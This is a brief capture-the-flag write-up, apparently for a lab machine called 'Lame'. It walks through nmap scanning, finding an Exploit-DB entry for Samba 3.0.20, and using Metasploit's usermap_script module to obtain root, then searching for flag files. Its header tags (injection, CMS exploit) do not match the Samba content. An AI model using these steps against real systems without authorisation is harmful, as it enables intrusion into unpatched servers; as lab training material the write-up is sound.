๐ฝLame Writeup
[Injection] [CMS Exploit]

Nmap
Nmap was executed with the following flags:
-Pn: Treat all hosts as online -- skip host discovery
-sC: Performs a script scan using the default set of scripts
-sV: Probe open ports to determine service/version info
Let's examine the following port and its running service for vulnerabilities:
Google
https://www.exploit-db.com/exploits/16320 appeared as one of the Google search results using the search term 'Samba smbd 3.0.20'.
Msfconsole
Run the following commands:
msfconsole
search samba
The module, 'usermap_script', will be used to exploit the vulnerability.
Execute the following to select and use the module:
use 8
show options
Set the required options:
RHOSTS
LPORT
LHOST
Execute 'run'
Execute 'whoami'
Since we were able to get 'root' privileges, we can use the 'find' command to search for the flags for both the user and root:
The other flag will be in the file 'root.txt':
find / -type f -name *.txt | grep root

Last updated